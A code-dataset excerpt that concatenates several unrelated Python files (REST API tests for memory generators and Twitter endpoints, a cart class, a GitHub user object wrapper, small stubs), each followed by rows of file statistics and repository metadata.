self._api.stop_memory_generator(g7r.id)
else:
g7r.running = True
self._api.start_memory_generator(g7r.id)
except Exception:
pass
self._results_count = len(self._api.list_memory_generator_results())
with it('not found (404)'):
request = client.models.BulkStartMemoryGeneratorsRequest(
[g7r.id for g7r in self._g8s] + ['unknown'])
expr = lambda: self._api.bulk_start_memory_generators(request)
expect(expr).to(raise_api_exception(404))
with it('state was not changed'):
for g7r in self._g8s:
result = self._api.get_memory_generator(g7r.id)
expect(result).to(be_valid_memory_generator)
expect(result.running).to(equal(g7r.running))
with it('new results was not created'):
results = self._api.list_memory_generator_results()
expect(len(results)).to(equal(self._results_count))
with description('with invalid ID'):
with before.all:
self._results_count = len(self._api.list_memory_generator_results())
with it('bad request (400)'):
request = client.models.BulkStartMemoryGeneratorsRequest(
[g7r.id for g7r in self._g8s] + ['bad_id'])
expr = lambda: self._api.bulk_start_memory_generators(request)
expect(expr).to(raise_api_exception(400))
with it('state was not changed'):
for g7r in self._g8s:
result = self._api.get_memory_generator(g7r.id)
expect(result).to(be_valid_memory_generator)
expect(result.running).to(equal(g7r.running))
with it('new results was not created'):
results = self._api.list_memory_generator_results()
expect(len(results)).to(equal(self._results_count))
with description('/memory-generators/x/bulk-stop'):
with context('PUT'):
with it('not allowed (405)'):
expect(lambda: self._api.api_client.call_api('/memory-generators/x/bulk-stop', 'PUT')).to(
raise_api_exception(405, headers={'Allow': "POST"}))
with description('POST'):
with before.all:
self._ids = []
model = memory_generator_model(self._api.api_client)
self._g8s = [
self._api.create_memory_generator(model)
for a in range(3)]
for a in range(3):
expect(wait_for_buffer_initialization_done(self._api, self._g8s[a].id, 10)).to(be_true)
with after.all:
request = client.models.BulkDeleteMemoryGeneratorsRequest(
[g7r.id for g7r in self._g8s])
self._api.bulk_delete_memory_generators(request)
with shared_context('stop generators'):
with before.all:
for g7r in self._g8s:
self._api.start_memory_generator(g7r.id)
with it('all running'):
for g7r in self._g8s:
result = self._api.get_memory_generator(g7r.id)
expect(result.running).to(be_true)
with it('no content (204)'):
request = client.models.BulkStopMemoryGeneratorsRequest(
[g7r.id for g7r in self._g8s] + self._ids)
result = self._api.bulk_stop_memory_generators_with_http_info(
request, _return_http_data_only=False)
expect(result[1]).to(equal(204))
with it('all stopped'):
for g7r in self._g8s:
result = self._api.get_memory_generator(g7r.id)
expect(result).to(be_valid_memory_generator)
expect(result.running).to(be_false)
with description('with existing IDs'):
with included_context('stop generators'):
pass
with description('already stopped generators'):
with it('no content (204)'):
request = client.models.BulkStopMemoryGeneratorsRequest(
[g7r.id for g7r in self._g8s])
result = self._api.bulk_stop_memory_generators_with_http_info(
request, _return_http_data_only=False)
expect(result[1]).to(equal(204))
with description('with non-existent ID'):
with before.all:
self._ids = ['unknown']
with included_context('stop generators'):
pass
with description('with invalid ID'):
with before.all:
self._ids = ['bad_id']
with included_context('stop generators'):
pass
with description('Memory Generator Results'):
with before.all:
model = memory_generator_model(self._api.api_client)
self._g7r = self._api.create_memory_generator(model)
expect(self._g7r).to(be_valid_memory_generator)
expect(wait_for_buffer_initialization_done(self._api, self._g7r.id, 10)).to(be_true)
self._runs = 3;
for i in range(self._runs):
self._api.start_memory_generator(self._g7r.id)
self._api.stop_memory_generator(self._g7r.id)
with description('/memory-generator-results'):
with context('PUT'):
with it('not allowed (405)'):
expect(lambda: self._api.api_client.call_api('/memory-generator-results', 'PUT')).to(
raise_api_exception(405, headers={'Allow': "GET"}))
with context('GET'):
with before.all:
self._result = self._api.list_memory_generator_results_with_http_info(
_return_http_data_only=False)
with it('success (200)'):
expect(self._result[1]).to(equal(200))
with it('has Content-Type: application/json header'):
expect(self._result[2]).to(has_json_content_type)
with it('results list'):
expect(self._result[0]).not_to(be_empty)
expect(len(self._result[0])).to(be(self._runs))
for result in self._result[0]:
expect(result).to(be_valid_memory_generator_result)
with description('/memory-generator-results/{id}'):
with before.all:
rlist = self._api.list_memory_generator_results()
expect(rlist).not_to(be_empty)
self._result = rlist[0]
with context('GET'):
with description('by existing ID'):
with before.all:
self._get_result = self._api.get_memory_generator_result_with_http_info(
self._result.id, _return_http_data_only=False)
with it('success (200)'):
expect(self._get_result[1]).to(equal(200))
with it('has Content-Type: application/json header'):
expect(self._get_result[2]).to(has_json_content_type)
with it('valid result'):
expect(self._get_result[0]).to(be_valid_memory_generator_result)
with description('by non-existent ID'):
with it('not found (404)'):
expr = lambda: self._api.get_memory_generator_result('unknown')
expect(expr).to(raise_api_exception(404))
with description('by invalid ID'):
with it('bad request (400)'):
expr = lambda: self._api.get_memory_generator_result('bad_id')
expect(expr).to(raise_api_exception(400))
with context('DELETE'):
with description('by existing ID'):
with description('active result'):
with before.all:
self._result = self._api.start_memory_generator(self._g7r.id)
with after.all:
self._api.stop_memory_generator(self._g7r.id)
with it('exists'):
expect(self._result).to(be_valid_memory_generator_result)
with it('is active'):
expect(self._result.active).to(be_true)
with it('bad request (400)'):
result = lambda: self._api.delete_memory_generator_result(self._result.id)
expect(result).to(raise_api_exception(400))
with it('not deleted'):
result = self._api.get_memory_generator_result(self._result.id)
expect(result).to(be_valid_memory_generator_result)
with description('inactive result'):
with before.all:
result = self._api.start_memory_generator(self._g7r.id)
self._api.stop_memory_generator(self._g7r.id)
self._result = self._api.get_memory_generator_result(result.id)
with it('exists'):
expect(self._result).to(be_valid_memory_generator_result)
with it('is not active'):
expect(self._result.active).to(be_false)
with it('deleted (204)'):
result = self._api.delete_memory_generator_result_with_http_info(
self._result.id, _return_http_data_only=False)
expect(result[1]).to(equal(204))
with it('not found (404)'):
expr = lambda: self._api.get_memory_generator_result(self._result.id)
expect(expr).to(raise_api_exception(404))
with description('by non-existent ID'):
with it('not found (404)'):
expr = lambda: self._api.delete_memory_generator_result('unknown')
expect(expr).to(raise_api_exception(404))
with description('by invalid ID'):
with it('bad request (400)'):
expr = lambda: self._api.delete_memory_generator_result('bad_id')
expect(expr).to(raise_api_exception(400))
with description('delete results with generator'):
with it('results exists'):
results = self._api.list_memory_generator_results()
expect(results).not_to(be_empty)
with it('generator deleted'):
result = self._api.delete_memory_generator_with_http_info(
self._g7r.id, _return_http_data_only=False)
expect(result[1]).to(equal(204))
with it('results deleted'):
results = self._api.list_memory_generator_results()
expect(results).to(be_empty)
| 47.425333
| 119
| 0.506424
| 3,586
| 35,569
| 4.748745
| 0.047128
| 0.109225
| 0.032885
| 0.031241
| 0.860004
| 0.81326
| 0.787128
| 0.74285
| 0.716542
| 0.684068
| 0
| 0.021557
| 0.398774
| 35,569
| 749
| 120
| 47.488652
| 0.774749
| 0
| 0
| 0.664992
| 0
| 0
| 0.099441
| 0.012258
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.021776
| 0.01675
| 0
| 0.01675
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
aa89a6f6abe7fdaa9e448870b527b47790971067
| 221
|
py
|
Python
|
src/models/cart.py
|
ehizman/eden
|
d231f614078c7031eaba63f7864fb7996927cc6d
|
[
"MIT"
] | null | null | null |
src/models/cart.py
|
ehizman/eden
|
d231f614078c7031eaba63f7864fb7996927cc6d
|
[
"MIT"
] | 1
|
2021-09-09T13:09:41.000Z
|
2021-09-10T13:31:00.000Z
|
src/models/cart.py
|
ehizman/eden
|
d231f614078c7031eaba63f7864fb7996927cc6d
|
[
"MIT"
] | 2
|
2021-08-19T15:03:22.000Z
|
2021-09-09T10:03:40.000Z
|
class Cart:
def __init__(self):
self.__list_of_items = []
def add_item_to_cart(self, item):
self.__list_of_items.append(item)
def get_items_in_cart(self):
return self.__list_of_items
| 22.1
| 41
| 0.669683
| 33
| 221
| 3.818182
| 0.454545
| 0.190476
| 0.238095
| 0.357143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.239819
| 221
| 9
| 42
| 24.555556
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0
| 0.142857
| 0.714286
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
2acf36ce7efb89e3384f4960b0129791045fd2b8
| 79
|
py
|
Python
|
pygul/__init__.py
|
mailcorahul/pygul
|
799c409ef315e7c012d91ead8b40cb96834a9302
|
[
"MIT"
] | null | null | null |
pygul/__init__.py
|
mailcorahul/pygul
|
799c409ef315e7c012d91ead8b40cb96834a9302
|
[
"MIT"
] | null | null | null |
pygul/__init__.py
|
mailcorahul/pygul
|
799c409ef315e7c012d91ead8b40cb96834a9302
|
[
"MIT"
] | null | null | null |
def README():
print('A Python Utility for Computer Vision and Deep learning')
| 26.333333
| 64
| 0.759494
| 12
| 79
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151899
| 79
| 2
| 65
| 39.5
| 0.895522
| 0
| 0
| 0
| 0
| 0
| 0.683544
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
6318e1ad23dd03def6b78e5910808798495c2794
| 68
|
py
|
Python
|
eddn/__init__.py
|
Athanasius/eddn-listener
|
90ea17676ff0cdbc5264cd1af5a7fd177b187d8e
|
[
"MIT"
] | null | null | null |
eddn/__init__.py
|
Athanasius/eddn-listener
|
90ea17676ff0cdbc5264cd1af5a7fd177b187d8e
|
[
"MIT"
] | null | null | null |
eddn/__init__.py
|
Athanasius/eddn-listener
|
90ea17676ff0cdbc5264cd1af5a7fd177b187d8e
|
[
"MIT"
] | 3
|
2017-09-03T18:06:56.000Z
|
2021-05-15T14:00:48.000Z
|
from eddn.database import database
from eddn.message import message
| 22.666667
| 34
| 0.852941
| 10
| 68
| 5.8
| 0.5
| 0.275862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 68
| 2
| 35
| 34
| 0.966667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2d875f9fe2e40fe5173a7c5c8c33a5c9462104c7
| 49
|
py
|
Python
|
playit/__init__.py
|
SaurabhGujjar/playit
|
8d7cd3a42cd6866ede45cf386d00410d97d16591
|
[
"MIT"
] | 1
|
2020-08-08T08:51:44.000Z
|
2020-08-08T08:51:44.000Z
|
playit/__init__.py
|
SaurabhGujjar/playit
|
8d7cd3a42cd6866ede45cf386d00410d97d16591
|
[
"MIT"
] | null | null | null |
playit/__init__.py
|
SaurabhGujjar/playit
|
8d7cd3a42cd6866ede45cf386d00410d97d16591
|
[
"MIT"
] | null | null | null |
from playit.cli import main, play, info, playlist
| 49
| 49
| 0.795918
| 8
| 49
| 4.875
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122449
| 49
| 1
| 49
| 49
| 0.906977
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2da8298beca01f53cead5ad8f4b4441d2c13fc7c
| 3,243
|
py
|
Python
|
aiogithubapi/objects/users/user.py
|
timmo001/aiogithubapi
|
9d33bad77e49f8ee720bcd81c2cbab8a4cf8ebac
|
[
"MIT"
] | 8
|
2019-07-24T18:14:25.000Z
|
2022-03-01T18:33:53.000Z
|
aiogithubapi/objects/users/user.py
|
timmo001/aiogithubapi
|
9d33bad77e49f8ee720bcd81c2cbab8a4cf8ebac
|
[
"MIT"
] | 33
|
2019-12-18T22:15:06.000Z
|
2022-03-30T06:08:38.000Z
|
aiogithubapi/objects/users/user.py
|
timmo001/aiogithubapi
|
9d33bad77e49f8ee720bcd81c2cbab8a4cf8ebac
|
[
"MIT"
] | 14
|
2019-09-02T17:50:16.000Z
|
2022-03-14T10:30:37.000Z
|
"""
Class object for AIOGitHubAPIUsersUser
Documentation: https://docs.github.com/en/rest/reference/users#get-a-user
Generated by generate/generate.py - 2020-08-02 10:35:28.920747
"""
from ..base import AIOGitHubAPIBase
class AIOGitHubAPIUsersUser(AIOGitHubAPIBase):
@property
def login(self):
return self.attributes.get("login", "")
@property
def id(self):
return self.attributes.get("id", None)
@property
def node_id(self):
return self.attributes.get("node_id", "")
@property
def avatar_url(self):
return self.attributes.get("avatar_url", "")
@property
def gravatar_id(self):
return self.attributes.get("gravatar_id", "")
@property
def url(self):
return self.attributes.get("url", "")
@property
def html_url(self):
return self.attributes.get("html_url", "")
@property
def followers_url(self):
return self.attributes.get("followers_url", "")
@property
def following_url(self):
return self.attributes.get("following_url", "")
@property
def gists_url(self):
return self.attributes.get("gists_url", "")
@property
def starred_url(self):
return self.attributes.get("starred_url", "")
@property
def subscriptions_url(self):
return self.attributes.get("subscriptions_url", "")
@property
def organizations_url(self):
return self.attributes.get("organizations_url", "")
@property
def repos_url(self):
return self.attributes.get("repos_url", "")
@property
def events_url(self):
return self.attributes.get("events_url", "")
@property
def received_events_url(self):
return self.attributes.get("received_events_url", "")
@property
def type(self):
return self.attributes.get("type", "")
@property
def site_admin(self):
return self.attributes.get("site_admin", False)
@property
def name(self):
return self.attributes.get("name", "")
@property
def company(self):
return self.attributes.get("company", "")
@property
def blog(self):
return self.attributes.get("blog", "")
@property
def location(self):
return self.attributes.get("location", "")
@property
def email(self):
return self.attributes.get("email", "")
@property
def hireable(self):
return self.attributes.get("hireable", False)
@property
def bio(self):
return self.attributes.get("bio", "")
@property
def twitter_username(self):
return self.attributes.get("twitter_username", "")
@property
def public_repos(self):
return self.attributes.get("public_repos", None)
@property
def public_gists(self):
return self.attributes.get("public_gists", None)
@property
def followers(self):
return self.attributes.get("followers", None)
@property
def following(self):
return self.attributes.get("following", None)
@property
def created_at(self):
return self.attributes.get("created_at", "")
@property
def updated_at(self):
return self.attributes.get("updated_at", "")
| 23.5
| 73
| 0.632439
| 370
| 3,243
| 5.435135
| 0.189189
| 0.175037
| 0.222775
| 0.3819
| 0.482347
| 0.334659
| 0.035803
| 0
| 0
| 0
| 0
| 0.008048
| 0.233734
| 3,243
| 137
| 74
| 23.671533
| 0.801207
| 0.054271
| 0
| 0.326531
| 1
| 0
| 0.096437
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.326531
| false
| 0
| 0.010204
| 0.326531
| 0.673469
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
93020f1f2ece4a1264853cebd0804e5416a8eec8
| 15,025
|
py
|
Python
|
test_wriggler/test_twitter_rest.py
|
parantapa/wriggler
|
805989c4be6754a0ebf1da9572774dc8efb8f6a7
|
[
"MIT"
] | null | null | null |
test_wriggler/test_twitter_rest.py
|
parantapa/wriggler
|
805989c4be6754a0ebf1da9572774dc8efb8f6a7
|
[
"MIT"
] | null | null | null |
test_wriggler/test_twitter_rest.py
|
parantapa/wriggler
|
805989c4be6754a0ebf1da9572774dc8efb8f6a7
|
[
"MIT"
] | 1
|
2018-03-02T05:34:35.000Z
|
2018-03-02T05:34:35.000Z
|
# pylint: disable=redefined-outer-name
"""
Test the search_tweets api.
"""
import pytest
import wriggler.twitter.auth as auth
import wriggler.twitter.rest as rest
TEST_USERS = [
(145125358, "SrBachchan"),
(762093631, "sig_chi")
]
TEST_LISTS = [
(2299490, "news", "mashable"),
(72905612, "healthcare", "cnnbrk")
]
TEST_QUERY = ["news", "ff"]
TEST_RETWEETED_TWEETS = [
# 718218948060143617, # https://twitter.com/SrBachchan/status/718218948060143617
# 718204766422048769, # https://twitter.com/SrBachchan/status/718204766422048769
717026378739290112, # https://twitter.com/POTUS/status/717026378739290112
714084384010272768, # https://twitter.com/POTUS/status/714084384010272768
]
@pytest.fixture
def samp_auth():
"""
Return the sample auth object.
"""
kfname = "test_keys-twitter.json"
ath = auth.read_keys(kfname)
return ath
def test_users_show(samp_auth):
"""
Test the users_show method.
"""
for user_id, screen_name in TEST_USERS:
params = {"user_id": user_id}
profile, meta = rest.users_show(samp_auth, **params)
assert meta["code"] == 200
assert profile["id"] == user_id
assert profile["screen_name"] == screen_name
params = {"screen_name": screen_name}
profile, meta = rest.users_show(samp_auth, **params)
assert meta["code"] == 200
assert profile["id"] == user_id
assert profile["screen_name"] == screen_name
def test_users_lookup(samp_auth):
"""
Test the users_lookup method.
"""
user_ids = set(u[0] for u in TEST_USERS)
screen_names = set(u[1] for u in TEST_USERS)
params = {"user_id": list(user_ids)}
profiles, meta = rest.users_lookup(samp_auth, **params)
assert meta["code"] == 200
assert user_ids == set(p["id"] for p in profiles)
assert screen_names == set(p["screen_name"] for p in profiles)
params = {"screen_name": list(screen_names)}
profiles, meta = rest.users_lookup(samp_auth, **params)
assert meta["code"] == 200
assert user_ids == set(p["id"] for p in profiles)
assert screen_names == set(p["screen_name"] for p in profiles)
def test_statuses_user_timeline(samp_auth):
"""
Test the statuses/user_timeline method.
"""
for user_id, screen_name in TEST_USERS:
params = {"user_id": user_id, "count": 10}
tweets, meta = rest.statuses_user_timeline(samp_auth, **params)
assert meta["code"] == 200
assert all(t["user"]["id"] == user_id for t in tweets)
assert all(t["user"]["screen_name"] == screen_name for t in tweets)
params = {"screen_name": screen_name, "count": 10}
tweets, meta = rest.statuses_user_timeline(samp_auth, **params)
assert meta["code"] == 200
assert all(t["user"]["id"] == user_id for t in tweets)
assert all(t["user"]["screen_name"] == screen_name for t in tweets)
def test_statuses_user_timeline_iter(samp_auth):
"""
Test the statuses/user_timeline method using id_iter.
"""
for user_id, screen_name in TEST_USERS:
params = {"user_id": user_id, "count": 10, "maxitems": 20}
results = []
for tweets, meta in rest.statuses_user_timeline(samp_auth, **params):
assert meta["code"] == 200
results.extend(tweets)
assert all(t["user"]["id"] == user_id for t in results)
assert all(t["user"]["screen_name"] == screen_name for t in results)
assert len(results) >= 20
assert len(set(r["id"] for r in results)) >= 20
def test_search_tweets(samp_auth):
"""
Test the tweets_search method.
"""
for query in TEST_QUERY:
params = {"q": query, "result_type": "recent"}
_, meta = rest.search_tweets(samp_auth, **params)
assert meta["code"] == 200
def test_search_tweets_iter(samp_auth):
"""
Test the tweets_search method w/ id_iter.
"""
for query in TEST_QUERY:
params = {"q": query, "result_type": "recent", "count": 10,
"maxitems": 20}
results = []
for data, meta in rest.search_tweets(samp_auth, **params):
assert meta["code"] == 200
results.extend(data["statuses"])
assert len(results) >= 20
assert len(set(r["id"] for r in results)) >= 20
def test_friends_ids(samp_auth):
"""
Test friends/ids method.
"""
for user_id, _ in TEST_USERS:
params = {"user_id": user_id, "count": 10}
data, meta = rest.friends_ids(samp_auth, **params)
assert meta["code"] == 200
assert len(data["ids"]) >= 10
def test_friends_ids_iter(samp_auth):
"""
Test friends/ids method w/ cursor_iter.
"""
for user_id, _ in TEST_USERS:
params = {"user_id": user_id, "count": 10, "maxitems": 20}
results = []
for data, meta in rest.friends_ids(samp_auth, **params):
assert meta["code"] == 200
assert len(data["ids"]) >= 10
results.extend(data["ids"])
assert len(results) >= 20
assert len(set(results)) >= 20
def test_followers_ids(samp_auth):
"""
Test followers/ids method.
"""
for user_id, _ in TEST_USERS:
params = {"user_id": user_id, "count": 10}
data, meta = rest.followers_ids(samp_auth, **params)
assert meta["code"] == 200
assert len(data["ids"]) >= 10
def test_followers_ids_iter(samp_auth):
"""
Test followers/ids method w/ cursor_iter.
"""
for user_id, _ in TEST_USERS:
params = {"user_id": user_id, "count": 10, "maxitems": 20}
results = []
for data, meta in rest.followers_ids(samp_auth, **params):
assert meta["code"] == 200
results.extend(data["ids"])
assert len(results) >= 20
assert len(set(results)) >= 20
def test_trends_available(samp_auth):
"""
Test the trends available api.
"""
data, meta = rest.trends_available(samp_auth)
assert meta["code"] == 200
assert isinstance(data, list)
assert len(data) > 10
for place in data:
assert "woeid" in place
def test_trends_place(samp_auth):
"""
Test the trends api for places.
"""
params = {"id": 1}
data, meta = rest.trends_place(samp_auth, **params)
assert meta["code"] == 200
for trend in data:
for obj in trend["trends"]:
assert "name" in obj
def test_favorites_list(samp_auth):
"""
Test the favorites/list method.
"""
for user_id, screen_name in TEST_USERS:
params = {"user_id": user_id, "count": 10}
tweets, meta = rest.favorites_list(samp_auth, **params)
assert meta["code"] == 200
assert all("id" in t for t in tweets)
assert all("text" in t for t in tweets)
params = {"screen_name": screen_name, "count": 10}
tweets, meta = rest.favorites_list(samp_auth, **params)
assert meta["code"] == 200
assert all("id" in t for t in tweets)
assert all("text" in t for t in tweets)
def test_favorites_list_iter(samp_auth):
"""
Test the favorites_list method using id_iter.
"""
for user_id, _ in TEST_USERS:
params = {"user_id": user_id, "count": 10, "maxitems": 20}
results = []
for tweets, meta in rest.favorites_list(samp_auth, **params):
assert meta["code"] == 200
results.extend(tweets)
assert all("id" in t for t in results)
assert all("text" in t for t in results)
assert len(results) >= 20
assert len(set(r["id"] for r in results)) >= 20
def test_statuses_show(samp_auth):
"""
Test the statuses/show method.
"""
for user_id, _ in TEST_USERS:
# First get the last tweet id for a test user
params = {"user_id": user_id, "count": 1}
tweet, meta = rest.statuses_user_timeline(samp_auth, **params)
assert meta["code"] == 200
tweet = tweet[0]
assert tweet["user"]["id"] == user_id
# Next get the same tweet with statuses show
nparams = {"id": tweet["id"]}
ntweet, nmeta = rest.statuses_show(samp_auth, **nparams)
assert nmeta["code"] == 200
assert tweet["id"] == ntweet["id"]
assert tweet["text"] == ntweet["text"]
def test_statuses_lookup(samp_auth):
"""
Test the statuses/lookup method.
"""
for user_id, _ in TEST_USERS:
# First get the last 10 tweet ids for a test user
params = {"user_id": user_id, "count": 10}
tweets, meta = rest.statuses_user_timeline(samp_auth, **params)
assert meta["code"] == 200
assert all(t["user"]["id"] == user_id for t in tweets)
# Create the list of tweet ids
tids = [t["id"] for t in tweets]
# Next get the same tweets using statues lookup
nparams = {"id": tids}
ntweets, nmeta = rest.statuses_lookup(samp_auth, **nparams)
assert nmeta["code"] == 200
assert set(tids) == set(t["id"] for t in ntweets)
def test_lists_memberships(samp_auth):
"""
Test the lists/memberships method.
"""
for user_id, screen_name in TEST_USERS:
params = {"user_id": user_id, "count": 10}
data, meta = rest.lists_memberships(samp_auth, **params)
assert meta["code"] == 200
assert "lists" in data
assert all("member_count" in l for l in data["lists"])
assert all("subscriber_count" in l for l in data["lists"])
params = {"screen_name": screen_name, "count": 10}
data, meta = rest.lists_memberships(samp_auth, **params)
assert meta["code"] == 200
assert "lists" in data
assert all("member_count" in l for l in data["lists"])
assert all("subscriber_count" in l for l in data["lists"])
def test_lists_memberships_iter(samp_auth):
"""
Test the lists/memberships method using cursor_iter.
"""
for user_id, screen_name in TEST_USERS:
params = {"user_id": user_id, "count": 10, "maxitems": 20}
results = []
for data, meta in rest.lists_memberships(samp_auth, **params):
assert meta["code"] == 200
assert "lists" in data
results.extend(data["lists"])
assert all("member_count" in l for l in results)
assert all("subscriber_count" in l for l in results)
assert len(results) >= 20
assert len(set(r["id"] for r in results)) >= 20
params = {"screen_name": screen_name, "count": 10, "maxitems": 20}
results = []
for data, meta in rest.lists_memberships(samp_auth, **params):
assert meta["code"] == 200
assert "lists" in data
results.extend(data["lists"])
assert all("member_count" in l for l in results)
assert all("subscriber_count" in l for l in results)
assert len(results) >= 20
assert len(set(r["id"] for r in results)) >= 20
def test_lists_show(samp_auth):
"""
Test the lists_show method.
"""
for list_id, slug, owner_screen_name in TEST_LISTS:
params = {"list_id": list_id}
lst, meta = rest.lists_show(samp_auth, **params)
assert meta["code"] == 200
assert lst["id"] == list_id
assert lst["slug"] == slug
assert lst["user"]["screen_name"] == owner_screen_name
params = {"slug": slug, "owner_screen_name": owner_screen_name}
lst, meta = rest.lists_show(samp_auth, **params)
assert meta["code"] == 200
assert lst["id"] == list_id
assert lst["slug"] == slug
assert lst["user"]["screen_name"] == owner_screen_name
def test_lists_members(samp_auth):
"""
Test the lists/members method.
"""
for list_id, slug, owner_screen_name in TEST_LISTS:
params = {"list_id": list_id, "count": 10}
data, meta = rest.lists_members(samp_auth, **params)
assert meta["code"] == 200
assert "users" in data
assert all("screen_name" in u for u in data["users"])
assert all("listed_count" in u for u in data["users"])
params = {"slug": slug, "owner_screen_name": owner_screen_name}
data, meta = rest.lists_members(samp_auth, **params)
assert meta["code"] == 200
assert "users" in data
assert all("screen_name" in u for u in data["users"])
assert all("listed_count" in u for u in data["users"])
def test_lists_members_iter(samp_auth):
"""
Test the lists/memberships method using cursor_iter.
"""
for list_id, slug, owner_screen_name in TEST_LISTS:
params = {"list_id": list_id, "count": 10, "maxitems": 20}
data, meta = rest.lists_members(samp_auth, **params)
results = []
for data, meta in rest.lists_members(samp_auth, **params):
assert meta["code"] == 200
assert "users" in data
results.extend(data["users"])
assert all("screen_name" in u for u in results)
assert all("listed_count" in u for u in results)
assert len(results) >= 20
assert len(set(r["id"] for r in results)) >= 20
params = {"slug": slug, "owner_screen_name": owner_screen_name,
"count": 10, "maxitems": 20}
data, meta = rest.lists_members(samp_auth, **params)
results = []
for data, meta in rest.lists_members(samp_auth, **params):
assert meta["code"] == 200
assert "users" in data
results.extend(data["users"])
assert all("screen_name" in u for u in results)
assert all("listed_count" in u for u in results)
assert len(results) >= 20
assert len(set(r["id"] for r in results)) >= 20
def test_statuses_retweeters_ids(samp_auth):
"""
Test statuses/retweeters/ids method.
"""
for retweeted_tweet_id in TEST_RETWEETED_TWEETS:
params = {"id": retweeted_tweet_id}
data, meta = rest.statuses_retweeters_ids(samp_auth, **params)
assert meta["code"] == 200
assert len(data["ids"]) >= 1
def test_statuses_retweeters_ids_iter(samp_auth):
"""
Test statuses/retweeters/ids method w/ cursor_iter.
"""
for retweeted_tweet_id in TEST_RETWEETED_TWEETS:
params = {"id": retweeted_tweet_id, "maxitems": 200}
results = []
for data, meta in rest.statuses_retweeters_ids(samp_auth, **params):
assert meta["code"] == 200
assert len(data["ids"]) >= 10
results.extend(data["ids"])
assert len(results) >= 1
assert len(set(results)) >= 1
def test_statuses_retweets_id(samp_auth):
"""
Test statuses/retweets/id method.
"""
for retweeted_tweet_id in TEST_RETWEETED_TWEETS:
params = {"id": retweeted_tweet_id}
data, meta = rest.statuses_retweets_id(samp_auth, **params)
assert meta["code"] == 200
assert len(data) >= 1
for tweet in data:
assert tweet["retweeted_status"]["id"] == retweeted_tweet_id
| 33.764045
| 84
| 0.608652
| 2,027
| 15,025
| 4.324618
| 0.066601
| 0.056582
| 0.054301
| 0.063997
| 0.827744
| 0.76386
| 0.746178
| 0.708647
| 0.687999
| 0.673625
| 0
| 0.035843
| 0.260965
| 15,025
| 444
| 85
| 33.84009
| 0.753602
| 0.096705
| 0
| 0.635417
| 0
| 0
| 0.096904
| 0.001669
| 0
| 0
| 0
| 0
| 0.420139
| 1
| 0.086806
| false
| 0
| 0.010417
| 0
| 0.100694
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fabff8a63852953a329e4a875fc34a0e8b2bca82
| 127
|
py
|
Python
|
modules/memberlist/_memberlist_updater.py
|
ptsurko/coursera_cloud
|
ed34a409034e2b7a85c6a3d5700c621fcabe8bde
|
[
"MIT"
] | null | null | null |
modules/memberlist/_memberlist_updater.py
|
ptsurko/coursera_cloud
|
ed34a409034e2b7a85c6a3d5700c621fcabe8bde
|
[
"MIT"
] | null | null | null |
modules/memberlist/_memberlist_updater.py
|
ptsurko/coursera_cloud
|
ed34a409034e2b7a85c6a3d5700c621fcabe8bde
|
[
"MIT"
] | null | null | null |
class _MemberlistUpdater(object):
def add_or_updater(self):
pass
def _get_memberlist(self):
pass
| 15.875
| 33
| 0.629921
| 14
| 127
| 5.357143
| 0.785714
| 0.213333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.299213
| 127
| 8
| 34
